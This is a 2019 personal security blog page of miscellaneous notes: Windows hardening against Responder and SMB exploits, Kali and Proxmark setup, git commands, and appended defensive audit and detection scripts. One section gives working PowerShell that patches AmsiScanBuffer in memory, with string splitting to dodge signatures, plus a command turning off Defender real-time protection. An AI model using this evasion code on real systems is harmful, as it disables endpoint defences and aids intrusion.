Just another vulnerable WordPress site

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

Set the “Turn off multicast name resolution” Group Policy setting to Enabled (this turns off LLMNR).

Don’t need SMB? Turn it off

From services.msc, disable and stop the “Server” service (AKA LanmanServer). Restart.

Need SMB but worried about EternalBlue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false
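The steps above as one audit-and-apply script. This is an added example, not code from the post; run it from an elevated PowerShell prompt. The registry key it touches for LLMNR (the DNSClient policy key with EnableMulticast = 0) is the one the “Turn off multicast name resolution” policy writes, and the script goes one step beyond the post by also disabling NetBIOS over TCP/IP, since Responder poisons NBT-NS requests as well as LLMNR. Without -Apply it only reports.

```powershell
# Added example (not from the post): audit the Responder/SMB hardening state
# described above and optionally apply it. Run from an elevated PowerShell.
# NBT-NS handling is an addition: Responder poisons NetBIOS name service
# requests as well as LLMNR, so turning off LLMNR alone leaves a gap.
param(
    [switch]$Apply,          # without -Apply the script only reports
    [switch]$DisableServer   # also disable and stop the Server (LanmanServer) service
)

# Key written by the "Turn off multicast name resolution" policy
$LlmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
# One Tcpip_{GUID} subkey per adapter; NetbiosOptions 0 = from DHCP, 1 = on, 2 = off
$NbtIfKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'

function Get-LlmnrEnabled {
    # EnableMulticast = 0 means the policy is Enabled (LLMNR off); anything else leaves LLMNR on
    $p = Get-ItemProperty -Path $LlmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
    return ($null -eq $p -or $p.EnableMulticast -ne 0)
}

function Get-NbtNsEnabledInterfaces {
    Get-ChildItem -Path $NbtIfKey | Where-Object {
        (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions -ne 2
    }
}

$smb    = Get-SmbServerConfiguration
$server = Get-Service -Name LanmanServer

[pscustomobject]@{
    LLMNR_Enabled          = Get-LlmnrEnabled
    NBTNS_Enabled_Adapters = @(Get-NbtNsEnabledInterfaces).Count
    SMB1_Enabled           = $smb.EnableSMB1Protocol
    SMB2_Enabled           = $smb.EnableSMB2Protocol
    ServerService          = "$($server.Status) / $($server.StartType)"
} | Format-List

if (-not $Apply) { return }

if (Get-LlmnrEnabled) {
    if (-not (Test-Path $LlmnrKey)) { New-Item -Path $LlmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $LlmnrKey -Name EnableMulticast -Value 0 -Type DWord
    Write-Host 'LLMNR disabled (EnableMulticast = 0)'
}

foreach ($if in Get-NbtNsEnabledInterfaces) {
    Set-ItemProperty -Path $if.PSPath -Name NetbiosOptions -Value 2 -Type DWord
}
Write-Host 'NetBIOS over TCP/IP disabled on all adapters'

if ($smb.EnableSMB1Protocol) {
    # -Force suppresses the confirmation prompt; SMB1 is the protocol EternalBlue targets
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    Write-Host 'SMB1 disabled'
}

if ($DisableServer) {
    # Same effect as the services.msc step: nothing is served over SMB afterwards
    Set-Service -Name LanmanServer -StartupType Disabled
    Stop-Service -Name LanmanServer -Force
    Write-Host 'Server (LanmanServer) service stopped and disabled; reboot to be sure'
}
```

On a domain-joined machine the policy key is re-applied at every Group Policy refresh, so a value set here by hand only sticks if no domain policy configures the same setting; check the report after the next refresh. Disabling the Server service or SMB2 also removes the admin shares that many remote management tools depend on.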


Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to PowerShell with admin rights. For the record, I’m not sure if this will work on a domain-joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistent and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel. The exact code in his blog post no longer works because it contains the string “AmsiScanBuffer”, but with a little concatenation it still works great!

Disable Defender

In PowerShell:

Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink
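Since the Defender change is a persistent registry value, it is also easy to check for. The script below is an added example, not code from the post: it reads the real-time protection state from Get-MpComputerStatus, Get-MpPreference and the two registry locations (the local Defender key that Set-MpPreference writes, and the Policies key a GPO would use), reports whether Tamper Protection is on where that property exists, and pulls the Defender operational-log events (ID 5001) written when real-time protection is turned off.

```powershell
# Added example (not from the post): check whether Defender real-time protection
# has been switched off the way the command above does it, and whether Tamper
# Protection would have blocked that. Run in PowerShell on the host being checked.
$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
$LocalKey  = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection'

function Get-RtpRegistryValue([string]$Path) {
    # DisableRealtimeMonitoring = 1 is the persistent switch Set-MpPreference writes
    $p = Get-ItemProperty -Path $Path -Name DisableRealtimeMonitoring -ErrorAction SilentlyContinue
    if ($null -eq $p) { return $null }
    return [int]$p.DisableRealtimeMonitoring
}

$status = Get-MpComputerStatus
$pref   = Get-MpPreference

[pscustomobject]@{
    RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
    AMServiceEnabled          = $status.AMServiceEnabled
    PreferenceDisableRTM      = $pref.DisableRealtimeMonitoring
    LocalRegistryDisableRTM   = Get-RtpRegistryValue $LocalKey    # 1 = disabled locally
    PolicyRegistryDisableRTM  = Get-RtpRegistryValue $PolicyKey   # 1 = disabled by policy
    # IsTamperProtected only exists on builds that ship Tamper Protection; $null otherwise
    TamperProtected           = $status.PSObject.Properties['IsTamperProtected'].Value
} | Format-List

# Event 5001 in the Defender operational log is written when real-time
# protection is turned off; list the most recent ones so the change is not silent.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 5001
} -MaxEvents 5 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message
```

Forwarding event 5001 to a central log is the cheap detection here; with Tamper Protection enabled the Set-MpPreference change is rejected in the first place. The in-memory AMSI patch leaves no registry trace and is not covered by this check.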

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open-vm-tools open-vm-tools-desktop

Then make sure you share your folder through VM -> Settings -> Options tab, and set the shared folders option to “Always Enabled”.

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the full image, and if you have the same issue I did, follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github
git init
git add .
git remote add origin git@github.com:username/new_repo
git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Beating Windows TrustedInstaller Permissions

takeown /F X:\FULL_PATH_TO_FOLDER /r /d y
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls X:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Credit to Micah in the comments.

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2019 Kazam
